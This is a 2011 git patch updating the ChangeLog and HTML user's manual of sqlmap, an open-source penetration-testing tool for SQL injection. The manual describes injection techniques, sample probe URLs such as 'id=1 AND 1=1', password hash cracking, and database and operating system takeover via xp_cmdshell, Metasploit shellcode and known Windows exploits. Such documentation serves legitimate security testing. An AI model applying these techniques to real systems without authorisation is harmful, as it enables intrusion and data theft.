From b47d3e1da3a0a61e23bcd83c9710af13edea931d Mon Sep 17 00:00:00 2001 From: Bernardo Damele Date: Sun, 27 Feb 2011 12:19:32 +0000 Subject: [PATCH] Huge update to user's manual. A lot to be done yet. --- doc/ChangeLog | 30 +- doc/README.html | 6213 +++++----------------- doc/README.pdf | 12996 +++++++++++++++++++++------------------------- doc/README.sgml | 4304 +++------------ 4 files changed, 8078 insertions(+), 15465 deletions(-) diff --git a/doc/ChangeLog b/doc/ChangeLog index 8be5c981b..1a3cb438d 100644 --- a/doc/ChangeLog +++ b/doc/ChangeLog @@ -1,37 +1,47 @@ sqlmap (0.9-1) stable; urgency=low + * Rewritten SQL injection detection engine (Bernardo and Miroslav). * Support to directly connect to the database without passing via a SQL injection, -d switch (Bernardo and Miroslav). + * Added full support for both time-based blind SQL injection and + error-based SQL injection techniques (Bernardo and Miroslav). * Implemented support for SQLite 2 and 3 (Bernardo and Miroslav). - * Initial support for Firebird, Sybase and SAP MaxDB (Miroslav). + * Implemented support for Firebird (Bernardo and Miroslav). + * Implemented support for Microsoft Access, Sybase and SAP MaxDB + (Miroslav). * Extended old '--dump -C' functionality to be able to search for specific database(s), table(s) and column(s), --search switch (Bernardo). * Added support to tamper injection data with --tamper switch (Bernardo and Miroslav). + * Added automatic recognition of password hashes format and support to + crack them with a dictionary-based attack (Miroslav). * Added support to enumerate roles on Oracle, --roles switch (Bernardo). * Added support for SOAP based web services requests (Bernardo). * Added support to fetch unicode data (Bernardo and Miroslav). * Added support to use persistent HTTP(s) connection for speed improvement, --keep-alive switch (Miroslav). - * Implemented HTTP proxy authentication support, --proxy-cred switch + * Support to test and inject against HTTP Referer header (Miroslav). + * Implemented HTTP(s) proxy authentication support, --proxy-cred switch (Miroslav). * Implemented feature to speedup the enumeration of table names (Miroslav). - * Support for customizable HTTP redirections (Bernardo). + * Support for customizable HTTP(s) redirections (Bernardo). * Support to replicate the back-end DBMS tables structure and entries in a local SQLite 3 database, --replicate switch (Miroslav). * Support to parse and test forms on target url, --forms switch - (Miroslav). - * Added switches to brute-force table names with a dictionary attack, - --common-exists and --exists. Useful for instance when system table - 'information_schema' is not available on MySQL (Miroslav). + (Bernardo and Miroslav). + * Added switches to brute-force tables names and columns names with a + dictionary attack, --common-tables and --common-columns. Useful for + instance when system table 'information_schema' is not available on + MySQL (Miroslav). * Basic support for REST-style URL parameters by using the asterisk (*) to mark where to test for and exploit SQL injection (Miroslav). * Added safe URL feature, --safe-url and --safe-freq (Miroslav). - * Added --text-only switch to strip from the HTTP body the HTML/JS code - and compare pages based only on their textual content (Miroslav). - * Several bugs fixed (Bernardo and Miroslav). + * Added --text-only switch to strip from the HTTP response body the + HTML/JS code and compare pages based only on their textual content + (Miroslav). + * Over 100 bugs fixed (Bernardo and Miroslav). * Major code refactoring (Bernardo and Miroslav). * User's manual updated (Bernardo). diff --git a/doc/README.html b/doc/README.html index be969823d..ae8ab131e 100644 --- a/doc/README.html +++ b/doc/README.html @@ -1,7 +1,7 @@ - + sqlmap user's manual @@ -9,13 +9,10 @@

by Bernardo Damele A. G., -Miroslav Stampar

version 0.8, March 14, 2010 +Miroslav Stamparversion 0.9, March 10, 2011
This document is the user's manual to use -sqlmap. -Check the project -homepage -for the latest version. +sqlmap.

1. Introduction

@@ -25,7 +22,6 @@ for the latest version.
  • 1.2 Scenario
  • 1.3 Techniques
  • 1.4 Demo -
  • 1.5 History

    2. Features

    @@ -36,10 +32,18 @@ for the latest version.
  • 2.3 Takeover features

    -

    3. Download and update

    +

    3. History

    +

    -

    4. License and copyright

    +

    4. Download and update

    5. Usage

    @@ -48,21 +52,28 @@ for the latest version.
  • 5.1 Output verbosity
  • 5.2 Target
  • 5.3 Request -
  • 5.4 Injection -
  • 5.5 Techniques -
  • 5.6 Fingerprint -
  • 5.7 Enumeration -
  • 5.8 User-defined function injection -
  • 5.9 File system access -
  • 5.10 Operating system access -
  • 5.11 Windows registry access -
  • 5.12 Miscellaneous +
  • 5.4 Optimization +
  • 5.5 Injection +
  • 5.6 Detection +
  • 5.7 Techniques +
  • 5.8 Fingerprint +
  • 5.9 Enumeration +
  • 5.10 Brute force +
  • 5.11 User-defined function injection +
  • 5.12 File system access +
  • 5.13 Operating system takeover +
  • 5.14 Windows registry access +
  • 5.15 General +
  • 5.16 Miscellaneous

    -

    6. Disclaimer

    +

    6. License and copyright

    -

    7. Authors

    +

    7. Disclaimer

    + +

    +

    8. Authors

    @@ -70,11 +81,11 @@ for the latest version.

    sqlmap is an open source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over of -back-end database servers. -It comes with a broad range of features lasting from database -fingerprinting, over data fetching from the database, to accessing the -underlying file system and executing commands on the operating system via -out-of-band connections.

    +database servers. It comes with a kick-ass detection engine, many niche +features for the ultimate penetration tester and a broad range of switches +lasting from database fingerprinting, over data fetching from the +database, to accessing the underlying file system and executing commands +on the operating system via out-of-band connections.

    1.1 Requirements @@ -84,7 +95,7 @@ out-of-band connections.

    Python, a dynamic object-oriented interpreted programming language. This makes the tool independent from the operating system. It only -requires the Python interpreter version equal or above to 2.5. +requires the Python interpreter version equal or higher than 2.6. The interpreter is freely downloadable from its official site. To make it even easier, many GNU/Linux distributions come out of the box @@ -96,26 +107,54 @@ for x86, AMD64 and Itanium too.

    Metasploit Framework for some of its post-exploitation takeover features. You need to grab a copy of it from the download -page. The required version is 3.4 or above.

    +page - the required version is 3.5 or higher. +For the ICMP tunneling out-of-band takeover technique, sqlmap requires +Impacket library too.

    +

    If you are willing to connect directly to a database server (-d switch), without passing +via a web application, you need to install Python bindings for the database +management system that you are going to attack:

    +

    +

    +

    If you plan to attack a web application behind NTLM authentication or use -the sqlmap update functionality you need to install respectively -python-ntlm -and +the sqlmap update functionality (--update switch) you need to +install respectively +python-ntlm and python-svn libraries.

    Optionally, if you are running sqlmap on Windows, you may wish to install PyReadline library to be able to take advantage of the sqlmap TAB completion and -history support functionalities in the SQL shell and OS shell. +history support features in the SQL shell and OS shell. Note that these functionalities are available natively by Python standard readline library on other operating systems.

    You can also choose to install -Psyco library to speed up the sqlmap algorithmic operations.

    +Psyco library to eventually speed up the sqlmap algorithmic +operations.

    1.2 Scenario

    +

    Detect and exploit a SQL injection

    +

    Let's say that you are auditing a web application and found a web page that accepts dynamic user-provided values on GET or POST parameters or HTTP Cookie values or HTTP User-Agent @@ -123,30 +162,31 @@ header value. You now want to test if these are affected by a SQL injection vulnerability, and if so, exploit them to retrieve as much information as possible out of the web application's back-end database management system -or even be able to access the underlying operating system.

    -

    Consider that the target url is:

    +or even be able to access the underlying file system and operating system.

    +

    In a simple world, consider that the target url is:

    -http://172.16.213.131/sqlmap/mysql/get_int.php?id=1 +http://192.168.136.131/sqlmap/mysql/get_int.php?id=1

    Assume that:

    -http://172.16.213.131/sqlmap/mysql/get_int.php?id=1+AND+1=1 +http://192.168.136.131/sqlmap/mysql/get_int.php?id=1+AND+1=1

    is the same page as the original one and:

    -http://172.16.213.131/sqlmap/mysql/get_int.php?id=1+AND+1=2 +http://192.168.136.131/sqlmap/mysql/get_int.php?id=1+AND+1=2

    differs from the original one, it means that you are in front of a SQL injection vulnerability in the id GET parameter of the -index.php web application page which means that no IDS/IPS, no -web application firewall, no parameters' value sanitization is performed -on the server-side.

    +index.php web application page which means that potentially no +IDS/IPS, no web application firewall, no parameters' value sanitization is +performed on the server-side before sending the SQL statement to the +back-end database management system the web application relies on.

    This is a quite common flaw in dynamic content web applications and it does not depend upon the back-end database management system nor on the web application programming language: it is a programmer code's security flaw. @@ -154,7 +194,7 @@ The Open Web Application Security Project rated on 2010 in their OWASP Top Ten survey this vulnerability as the -most common and important web application vulnerability along with other +most common and important web application vulnerability along with other injection flaws.

    Back to the scenario, probably the SQL SELECT statement into get_int.php has a syntax similar to the following SQL query, in @@ -169,7 +209,9 @@ a value for id such condition will take place when the web application passes the query to the back-end database management system that executes it, that is why the condition id=1 AND 1=1 is valid (True) and returns the same page as the original one, with the -same content and without showing any SQL error message.

    +same content. This is the case of a boolean-based blind SQL injection +vulnerability. However, sqlmap is able to detect any type of SQL injection +and adapt its work-flow accordingly. Read below for further details.

    Moreover, in this simple and easy to inject scenario it would be also possible to append, not just one or more valid SQL condition(s), but also stacked SQL queries, for instance something like [...]&id=1; @@ -180,57 +222,82 @@ exploit it by manipulating the id parameter value in the HTTP request.

    There exist many resources -on the Net explaining in depth how to prevent, how to detect and how to -exploit SQL injection vulnerabilities in web application and it is -recommended to read them if you are not familiar with the issue before -going ahead with sqlmap.

    -

    Passing the original address, http://172.16.213.131/sqlmap/mysql/get_int.php?id=1 +on the Net explaining in depth how to prevent, detect and exploit SQL +injection vulnerabilities in web application and it is recommended to read +them if you are not familiar with the issue before going ahead with sqlmap.

    +

    Passing the original address, http://192.168.136.131/sqlmap/mysql/get_int.php?id=1 to sqlmap, the tool will automatically:

      -
    • Identify the vulnerable parameter(s) (id in this scenario);
      • -
    • Depending on the user's options, fingerprint, enumerate, takeover -the database server.
      • +
    • Identify the vulnerable parameter(s) (id in this example);
      • +
    • Identify which SQL injection techniques can be used to exploit the +vulnerable parameter(s);
      • +
    • Fingerprint the back-end database management system;
      • +
    • Depending on the user's options, it will extensively fingerprint, +enumerate data or takeover the database server as a whole.

    +

    Direct connection to the database management system

    + +

    Up until sqlmap version 0.8, the tool has been yet another +SQL injection tool, used by web application penetration testers/newbies/curious +teens/computer addicted/punks and so on. Things move on +and as they evolve, we do as well. Now it supports this new switch, +-d, that allows you to connect from your machine to the database +server's TCP port where the database management system daemon is listening +on and perform any operation you would do while using it to attack a +database via a SQL injection vulnerability.

    +

    1.3 Techniques

    -

    sqlmap implements three techniques to exploit a SQL injection -vulnerability:

    +

    sqlmap is able to detect and exploit five different SQL injection +types:

      -
    • Inferential blind SQL injection, also known as boolean -based blind SQL injection: sqlmap appends to the affected parameter in +
    • Boolean-based blind SQL injection, also known as inferential +SQL injection: sqlmap replaces or appends to the affected parameter in the HTTP request, a syntatically valid SQL statement string containing a SELECT sub-statement, or any other SQL statement whose the user want to retrieve the output. -For each HTTP response, by making a comparison based upon HTML page -content hashes, or string matches, with the original request, the tool -determines the output value of the statement character by character. +For each HTTP response, by making a comparison between the HTTP response +headers/body with the original request, the tool inference the output of +the injected statement character by character. Alternatively, the user +can provide a string or regular expression to match on True pages. The bisection algorithm implemented in sqlmap to perform this technique -is able to fetch each output character with at maximum seven HTTP -requests. -This is sqlmap default SQL injection technique.
      • -
    • UNION query (inband) SQL injection, also known as full -UNION query SQL injection: sqlmap appends to the affected parameter -in the HTTP request, a syntatically valid SQL statement string starting -with a UNION ALL SELECT. This techique is useful if the web -application page passes the output of the SELECT statement to a -for cycle, or similar, so that each line of the query output is -printed on the page content. +is able to fetch each character of the output with a maximum of seven HTTP +requests. Where the output is not within the clear-text plain charset, +sqlmap will adapt the algorithm with bigger ranges to detect the output.
      • +
    • Time-based blind SQL injection, also known as full blind +SQL injection: sqlmap replaces or appends to the affected parameter in +the HTTP request, a syntatically valid SQL statement string containing a +query which put on hold the back-end DBMS to return for a certain number +of seconds. +For each HTTP response, by making a comparison between the HTTP response +time with the original request, the tool inference the output of +the injected statement character by character. Like for boolean-based +technique, the bisection algorithm is applied.
      • +
    • Error-based SQL injection: sqlmap replaces or append to the +affected parameter a database-specific syntatically wrong statement and +parses the HTTP response headers and body in search of DBMS error messages +containing the injected pre-defined chain of characters and the statement +output within. This technique works when the web application has been +configured to disclose back-end database management system error messages +only.
      • +
    • UNION query SQL injection, also known as inband SQL +injection: sqlmap appends to the affected parameter a syntatically +valid SQL statement string starting with a UNION ALL SELECT. +This techique works when the web application page passes the output of the +SELECT statement within a for cycle, or similar, so that +each line of the query output is printed on the page content. sqlmap is also able to exploit partial (single entry) UNION query SQL -injection vulnerabilities which occur when the output of the statement -is not cycled in a for construct whereas only the first entry output is -displayed. -This technique is much faster if the target url is affected by because -in a single HTTP response it returns the whole query output or a entry -per each response within the page content. -This SQL injection technique is an alternative to the first one.
      • -
    • Batched (stacked) queries support, also known as multiple -statements support: sqlmap tests if the web application supports +injection vulnerabilities which occur when the output of the +statement is not cycled in a for construct whereas only the first +entry of the query output is displayed.
      • +
    • Stacked queries SQL injection, also known as multiple +statements SQL injection: sqlmap tests if the web application supports stacked queries then, in case it does support, it appends to the affected parameter in the HTTP request, a semi-colon (;) followed by the SQL statement to be executed. This technique is useful to run SQL @@ -242,38 +309,296 @@ and the session user privileges.

    +

    1.4 Demo

    You can watch several demo videos, they are hosted on -YouTube and linked -from -here.

    +YouTube.

    -

    1.5 History + +

    2. Features

    + +

    Features implemented in sqlmap include:

    + + +

    2.1 Generic features

    -

    2010

    -

      +
    • Full support for MySQL, Oracle, PostgreSQL, +Microsoft SQL Server, Microsoft Access, SQLite, +Firebird, Sybase and SAP MaxDB database +management systems. +
      • +
    • Full support for five SQL injection techniques: boolean-based +blind, time-based blind, error-based, +UNION query and stacked queries. +
      • +
    • Support to directly connect to the database without passing +via a SQL injection, by providing DBMS credentials, IP address, port and +database name. +
      • +
    • It is possible to provide a single target URL, get the list of +targets from +Burp proxy +or +WebScarab proxy requests log files, get the whole HTTP request +from a text file or get the list of targets by providing sqlmap with a +Google dork which queries +Google search engine and parses its results page. You can also +define a regular-expression based scope that is used to identify which of +the parsed addresses to test. +
      • +
    • Tests provided GET parameters, POST parameters, +HTTP Cookie header values, HTTP User-Agent header value +and HTTP Referer header value to identify and exploit SQL +injection vulnerabilities. It is also possible to specify a comma-separated +list of specific parameter(s) to test. +
      • +
    • Option to specify the maximum number of concurrent HTTP(S) +requests (multi-threading) to speed up the blind SQL injection +techniques. It is also possible to specify the number of seconds to +hold between each HTTP(S) request. +
      • +
    • HTTP Cookie header string support, useful when the +web application requires authentication based upon cookies and you have +such data or in case you just want to test for and exploit SQL injection +on such header values. You can also specify to always URL-encode the +Cookie. +
      • +
    • Automatically handles HTTP Set-Cookie header from +the application, re-establishing of the session if it expires. Test and +exploit on these values is supported too. Vice versa, you can also force +to ignore any Set-Cookie header. +
      • +
    • HTTP protocol Basic, Digest, NTLM and Certificate +authentications support. +
      • +
    • HTTP(S) proxy support to pass by the requests to the target +application that works also with HTTPS requests and with authenticated +proxy servers. +
      • +
    • Options to fake the HTTP Referer header value and +the HTTP User-Agent header value specified by user or +randomly selected from a textual file. +
      • +
    • Support to increase the verbosity level of output messages: +there exist seven levels of verbosity. +
      • +
    • Support to parse HTML forms from the target URL and forge +HTTP(S) requests against those pages to test the form parameters against +vulnerabilities. +
      • +
    • Granularity and flexibility in terms of both user's +switches and features. +
      • +
    • Estimated time of arrival support for each query, updated +in real time, to provide the user with an overview on how long it will +take to retrieve the queries' output. +
      • +
    • Automatically saves the session (queries and their output, even if +partially retrieved) on a textual file in real time while fetching the +data and resumes the injection by parsing the session file. +
      • +
    • Support to read options from a configuration INI file rather than +specify each time all of the switches on the command line. Support also to +generate a configuration file based on the command line switches provided. +
      • +
    • Support to replicate the back-end database tables structure and +entries on a local SQLite 3 database. +
      • +
    • Option to update sqlmap to the latest development version from the +subversion repository. +
      • +
    • Support to parse HTTP(S) responses and display any DBMS error +message to the user. +
      • +
    • Integration with other IT security open source projects, +Metasploit and +w3af.
      • +
    +

    + + +

    2.2 Fingerprint and enumeration features +

    + +

    +

      +
    • Extensive back-end database software version and underlying +operating system fingerprint based upon +error messages, +banner parsing, +functions output comparison and +specific features +such as MySQL comment injection. It is also possible to force the back-end +database management system name if you already know it. +
      • +
    • Basic web server software and web application technology +fingerprint. +
      • +
    • Support to retrieve the DBMS banner, session user +and current database information. The tool can also check if the +session user is a database administrator (DBA). +
      • +
    • Support to enumerate database users, users' password +hashes, users' privileges, users' roles, +databases, tables and columns. +
      • +
    • Automatic recognition of password hashes format and support to +crack them with a dictionary-based attack. +
      • +
    • Support to brute-force tables and columns name. This is +useful when the session user has no read access over the system table +containing schema information or when the database management system does +not store this information anywhere (e.g. MySQL < 5.0). +
      • +
    • Support to dump database tables entirely, a range of +entries or specific columns as per user's choice. The user can also choose +to dump only a range of characters from each column's entry. +
      • +
    • Support to automatically dump all databases' schemas and +entries. It is possibly to exclude from the dump the system databases. +
      • +
    • Support to search for specific database names, specific tables +across all databases or specific columns across all databases' +tables. This is useful, for instance, to identify tables containing +custom application credentials where relevant columns' names contain +string like name and pass. +
      • +
    • Support to run custom SQL statement(s) as in an interactive +SQL client connecting to the back-end database. sqlmap automatically +dissects the provided statement, determines which technique fits best to +inject it and how to pack the SQL payload accordingly.
      • +
    +

    + + +

    2.3 Takeover features +

    + +

    Some of these techniques are detailed in the white paper +Advanced SQL injection to operating system full control and in the +slide deck +Expanding the control over the operating system from the database.

    +

    +

      +
    • Support to inject custom user-defined functions: the user +can compile a shared library then use sqlmap to create within the back-end +DBMS user-defined functions out of the compiled shared library file. These +UDFs can then be executed, and optionally removed, via sqlmap. This is +supported when the database software is MySQL or PostgreSQL. +
      • +
    • Support to download and upload any file from the database +server underlying file system when the database software is MySQL, +PostgreSQL or Microsoft SQL Server. +
      • +
    • Support to execute arbitrary commands and retrieve their +standard output on the database server underlying operating system +when the database software is MySQL, PostgreSQL or Microsoft SQL Server. +
        +
      • On MySQL and PostgreSQL via user-defined function injection and +execution.
        • +
      • On Microsoft SQL Server via xp_cmdshell() stored procedure. +Also, the stored procedure is re-enabled if disabled or created from +scratch if removed by the DBA.
        • +
      + +
      • +
    • Support to establish an out-of-band stateful TCP connection +between the attacker machine and the database server underlying +operating system. This channel can be an interactive command prompt, a +Meterpreter session or a graphical user interface (VNC) session as per +user's choice. +sqlmap relies on Metasploit to create the shellcode and implements four +different techniques to execute it on the database server. These +techniques are: +
        +
      • Database in-memory execution of the Metasploit's shellcode +via sqlmap own user-defined function sys_bineval(). Supported on +MySQL and PostgreSQL.
        • +
      • Upload and execution of a Metasploit's stand-alone payload +stager via sqlmap own user-defined function sys_exec() on +MySQL and PostgreSQL or via xp_cmdshell() on Microsoft SQL +Server.
        • +
      • Execution of Metasploit's shellcode by performing a SMB +reflection attack ( +MS08-068) with a UNC path request from the database server to +the attacker's machine where the Metasploit smb_relay server +exploit listens. Supported when running sqlmap with high privileges +(uid=0) on Linux/Unix and the target DBMS runs as Administrator +on Windows.
        • +
      • Database in-memory execution of the Metasploit's shellcode by +exploiting Microsoft SQL Server 2000 and 2005 +sp_replwritetovarbin stored procedure heap-based buffer +overflow ( +MS09-004). sqlmap has its own exploit to trigger the +vulnerability with automatic DEP memory protection bypass, but it relies +on Metasploit to generate the shellcode to get executed upon successful +exploitation.
        • +
      + +
      • +
    • Support for database process' user privilege escalation via +Metasploit's getsystem command which include, among others, +the +kitrap0d technique ( +MS10-015). +
      • +
    • Support to access (read/add/delete) Windows registry hives.
      • +
    +

    + + +

    3. History

    + +

    3.1 2011 +

    + +

    +

      +
    • March 10, +Bernardo and Miroslav release sqlmap +0.9 featuring a totally rewritten and powerful SQL injection +detection engine, the possibility to connect directly to a database +server, support for time-based blind SQL injection and error-based SQL +injection, support for four new database management systems and much more.
      • +
    +

    + +

    3.2 2010 +

    + +

    +

      +
    • December, +Bernardo and Miroslav have enhanced sqlmap a +lot during the whole year and prepare to release sqlmap 0.9 +within the first quarter of 2011.
      • +
    • June 3, Bernardo +presents +a talk titled Got database access? Own the network! at AthCon +2010 in Athens (Greece).
    • March 14, -Bernardo and Miroslav release stable version of +Bernardo and Miroslav release stable version of sqlmap 0.8 featuring many features. Amongst these, support to enumerate and dump all databases' tables containing user provided column(s), stabilization and enhancements to the takeover functionalities, updated integration with Metasploit 3.3.3 and a lot of minor features and bug fixes.
    • March, sqlmap demo videos have been -published.
      • +published.
    • January, Bernardo is invited to present at -AthCon conference in Greece on June -2010.
      • +AthCon conference in +Greece on June 2010.

    -

    2009

    +

    3.3 2009 +

      @@ -297,7 +622,7 @@ Poland.
    • September 26, sqlmap version 0.8 release candidate 1 goes public on the -Subversion repository, with all the attack +subversion repository, with all the attack vectors unveiled at SOURCE Barcelona 2009 Conference. These include an enhanced version of the Microsoft SQL Server buffer overflow exploit to automatically bypass DEP memory protection, support to establish the @@ -308,8 +633,10 @@ inject custom user-defined functions.
    • September 21, Bernardo and Guido Landi -present their research ( -slides) at SOURCE Conference 2009 in Barcelona, Spain. +present +their research ( +slides) +at SOURCE Conference 2009 in Barcelona, Spain.
    • August, Bernardo is accepted as a speaker at two others IT security conferences, @@ -353,7 +680,7 @@ the database.
    • April 16, Bernardo presents his research ( slides, -whitepaper) at Black Hat Europe 2009 in Amsterdam, The Netherlands. +whitepaper) at Black Hat Europe 2009 in Amsterdam, The Netherlands. The feedback from the audience is good and there has been some media coverage too.
      • @@ -380,7 +707,8 @@ private event in London, UK.

    -

    2008

    +

    3.4 2008 +

      @@ -400,7 +728,7 @@ tool and Metasploit: an auxiliary module to launch sqlmap from within Metasploit Framework. The -Subversion development repository goes public again. +subversion development repository goes public again.
    • September 1, nearly one year after the previous release, sqlmap 0.6 comes to life featuring a complete code @@ -411,12 +739,13 @@ new installation packages for Debian, Red Hat, Windows and much more.
    • August, two public mailing lists are created on SourceForge.
      • -
    • January, sqlmap Subversion development repository is moved +
    • January, sqlmap subversion development repository is moved away from SourceForge and goes private for a while.

    -

    2007

    +

    3.5 2007 +

      @@ -448,7 +777,8 @@ parameters.

    -

    2006

    +

    3.6 2006 +

    -

    2. Features

    - -

    Features implemented in sqlmap include:

    - - -

    2.1 Generic features -

    - -

    -

      -
    • Full support for MySQL, Oracle, PostgreSQL -and Microsoft SQL Server back-end database management systems. -Besides these four database management systems software, sqlmap can also -identify Microsoft Access, DB2, Informix, Sybase and Interbase. -
      • -
    • Full support for three SQL injection techniques: inferential -blind SQL injection, UNION query (inband) SQL injection and -batched queries support. sqlmap can also test for time based -blind SQL injection. -
      • -
    • It is possible to provide a single target URL, get the list of -targets from -Burp proxy -requests log file or -WebScarab proxy conversations/ folder, get the whole HTTP -request from a text file or get the list of targets by providing sqlmap -with a Google dork which queries -Google search engine and parses its results page. You can also -define a regular-expression based scope that is used to identify which of -the parsed addresses to test. -
      • -
    • Automatically tests all provided GET parameters, -POST parameters, HTTP Cookie header values and HTTP -User-Agent header value to find the dynamic ones, which means -those that vary the HTTP response page content. -On the dynamic ones sqlmap automatically tests and detects the ones -affected by SQL injection. Each dynamic parameter is tested for -numeric, single quoted string, double quoted -string and all of these three data-types with zero to two parenthesis -to correctly detect which is the SELECT statement syntax to -perform further injections with. It is also possible to specify the only -parameter(s) that you want to perform tests and use for injection on. -
      • -
    • Option to specify the maximum number of concurrent HTTP -requests to speed up the inferential blind SQL injection algorithms -(multi-threading). It is also possible to specify the number of seconds to -wait between each HTTP request. -
      • -
    • HTTP Cookie header string support, useful when the -web application requires authentication based upon cookies and you have -such data or in case you just want to test for and exploit SQL injection -on such header. You can also specify to always URL-encode the Cookie -header. -
      • -
    • Automatically handle HTTP Set-Cookie header from -the application, re-establishing of the session if it expires. Test and -exploit on these values is supported too. You can also force to ignore any -Set-Cookie header. -
      • -
    • HTTP Basic, Digest, NTLM and Certificate authentications -support. -
      • -
    • Anonymous HTTP proxy support to pass by the requests to the -target application that works also with HTTPS requests. -
      • -
    • Options to fake the HTTP Referer header value and -the HTTP User-Agent header value specified by user or -randomly selected from a text file. -
      • -
    • Support to increase the verbosity level of output messages: -there exist six levels. The default level is 1 in which -information, warnings, errors and tracebacks (if any occur) will be shown. -
      • -
    • Granularity in the user's options. -
      • -
    • Estimated time of arrival support for each query, updated -in real time while fetching the information to give to the user an -overview on how long it will take to retrieve the output. -
      • -
    • Automatic support to save the session (queries and their output, -even if partially retrieved) in real time while fetching the data on a -text file and resume the injection from this file in a second -time. -
      • -
    • Support to read options from a configuration INI file rather than -specify each time all of the options on the command line. Support also to -save command line options on a configuration INI file. -
      • -
    • Option to update sqlmap as a whole to the latest development version -from the Subversion repository. -
      • -
    • Integration with other IT security open source projects, -Metasploit and -w3af.
      • -
    -

    - - -

    2.2 Fingerprint and enumeration features -

    - -

    -

      -
    • Extensive back-end database software version and underlying -operating system fingerprint based upon -inband error messages, -banner parsing, -functions output comparison and -specific features -such as MySQL comment injection. It is also possible to force the back-end -database management system name if you already know it. -
      • -
    • Basic web server software and web application technology fingerprint. -
      • -
    • Support to retrieve the DBMS banner, session user -and current database information. The tool can also check if the -session user is a database administrator (DBA). -
      • -
    • Support to enumerate database users, users' password -hashes, users' privileges, databases, -tables and columns. -
      • -
    • Support to dump database tables as a whole or a range of -entries as per user's choice. The user can also choose to dump only -specific column(s). -
      • -
    • Support to automatically dump all databases' schemas and -entries. It is possibly to exclude from the dump the system databases. -
      • -
    • Support to enumerate and dump all databases' tables containing user -provided column(s). Useful to identify for instance tables containing -custom application credentials. -
      • -
    • Support to run custom SQL statement(s) as in an interactive -SQL client connecting to the back-end database. sqlmap automatically -dissects the provided statement, determines which technique to use to -inject it and how to pack the SQL payload accordingly.
      • -
    -

    - - -

    2.3 Takeover features -

    - -

    Some of these techniques are detailed in the white paper -Advanced SQL injection to operating system full control and in the -slide deck -Expanding the control over the operating system from the database.

    -

    -

      -
    • Support to inject custom user-defined functions: the user -can compile shared object then use sqlmap to create within the back-end -DBMS user-defined functions out of the compiled shared object file. These -UDFs can then be executed, and optionally removed, via sqlmap too. -
      • -
    • Support to read and upload any file from the database -server underlying file system when the database software is MySQL, -PostgreSQL or Microsoft SQL Server. -
      • -
    • Support to execute arbitrary commands and retrieve their -standard output on the database server underlying operating system -when the database software is MySQL, PostgreSQL or Microsoft SQL Server. -
        -
      • On MySQL and PostgreSQL via user-defined function injection and -execution.
        • -
      • On Microsoft SQL Server via xp_cmdshell() stored procedure. -Also, the stored procedure is re-enabled if disabled or created from -scratch if removed.
        • -
      - -
      • -
    • Support to establish an out-of-band stateful TCP connection -between the user machine and the database server underlying operating -system. This channel can be an interactive command prompt, a Meterpreter -session or a graphical user interface (VNC) session as per user's choice. -sqlmap relies on Metasploit to create the shellcode and implements four -different techniques to execute it on the database server. These -techniques are: -
        -
      • Database in-memory execution of the Metasploit's shellcode -via sqlmap own user-defined function sys_bineval(). Supported on -MySQL and PostgreSQL.
        • -
      • Upload and execution of a Metasploit's stand-alone payload -stager via sqlmap own user-defined function sys_exec() on -MySQL and PostgreSQL or via xp_cmdshell() on Microsoft SQL -Server.
        • -
      • Execution of Metasploit's shellcode by performing a SMB -reflection attack ( -MS08-068) with a UNC path request from the database server to -the user's machine where the Metasploit smb_relay server exploit -runs.
        • -
      • Database in-memory execution of the Metasploit's shellcode by -exploiting Microsoft SQL Server 2000 and 2005 -sp_replwritetovarbin stored procedure heap-based buffer -overflow ( -MS09-004) with automatic DEP bypass.
        • -
      - -
      • -
    • Support for database process' user privilege escalation via -Metasploit's getsystem command which include, among others, -the -kitrap0d technique ( -MS10-015) or via -Windows Access Tokens insecure design by using Meterpreter's -incognito extension. -
      • -
    • Support to access (read/add/delete) Windows registry hives.
      • -
    -

    - - -

    3. Download and update

    +

    4. Download and update

    sqlmap can be downloaded from its SourceForge File List page. -It is available in various formats:

    +It is available in two formats:

    -

    You can also checkout the latest development version from the sqlmap -Subversion +

    You can also checkout the latest development version from the +subversion repository:

    @@ -725,9 +828,7 @@ $ svn checkout https://svn.sqlmap.org/sqlmap/trunk/sqlmap sqlmap-dev

    -

    If you download a source package (gzip, bzip2 or zip) or sqlmap from the -Subversion repository, you can update it to the latest development version -anytime by running:

    +

    You can update it at any time to the latest development version by running:

    @@ -744,36 +845,8 @@ $ svn update

    -

    Viceversa if you download a binary package (deb, rpm or exe), the -update feature is disabled.

    - -

    There are some differences between the packages:

    -

    -

      -
    • The source packages (gzip, bzip2 and zip) have all features. They -contains the working copy from the Subversion repository updated at the -time the sqlmap new version has been released.
      • -
    • The Debian and Red Hat installation packages (deb and rpm) are -compliant with the Linux distributions' packaging guidelines. This implies -that they do not support the update features and do not include UPX (used -to pack the Metasploit payload stager in some cases, see below).
      • -
    • The Windows binary package (exe) can't update itself and does not -support the takeover out-of-band features because they rely on -Metasploit's msfcli which is not available for Windows.
      • -
    -

    - -

    It is therefore recommended to download any of the source packages and run -it either from a shell like Bash on Unix and Mac OSX or from Cygwin on -Windows.

    - - -

    4. License and copyright

    - -

    sqlmap is released under the terms of the -General Public License v2. -sqlmap is copyrighted by -Bernardo Damele A. G..

    +

    This is strongly recommended before reporting any bug to the +mailing list.

    5. Usage

    @@ -783,20 +856,21 @@ sqlmap is copyrighted by 
     $ python sqlmap.py -h
 
-    sqlmap/0.8 - automatic SQL injection and database takeover tool
+    sqlmap/0.9 - automatic SQL injection and database takeover tool
     http://sqlmap.sourceforge.net
-    
+
 Usage: sqlmap.py [options]
 
 Options:
   --version             show program's version number and exit
   -h, --help            show this help message and exit
-  -v VERBOSE            Verbosity level: 0-5 (default 1)
+  -v VERBOSE            Verbosity level: 0-6 (default 1)
 
   Target:
     At least one of these options has to be specified to set the source to
     get target urls from.
 
+    -d DIRECT           Direct connection to the database
     -u URL, --url=URL   Target url
     -l LIST             Parse targets from Burp or WebScarab proxy logs
     -r REQUESTFILE      Load HTTP request from a file
@@ -806,53 +880,65 @@ Options:
   Request:
     These options can be used to specify how to connect to the target url.
 
-    --method=METHOD     HTTP method, GET or POST (default GET)
     --data=DATA         Data string to be sent through POST
     --cookie=COOKIE     HTTP Cookie header
     --cookie-urlencode  URL Encode generated cookie injections
     --drop-set-cookie   Ignore Set-Cookie header from response
     --user-agent=AGENT  HTTP User-Agent header
-    -a USERAGENTSFILE   Load a random HTTP User-Agent header from file
+    --random-agent      Use randomly selected HTTP User-Agent header
     --referer=REFERER   HTTP Referer header
     --headers=HEADERS   Extra HTTP headers newline separated
     --auth-type=ATYPE   HTTP authentication type (Basic, Digest or NTLM)
     --auth-cred=ACRED   HTTP authentication credentials (name:password)
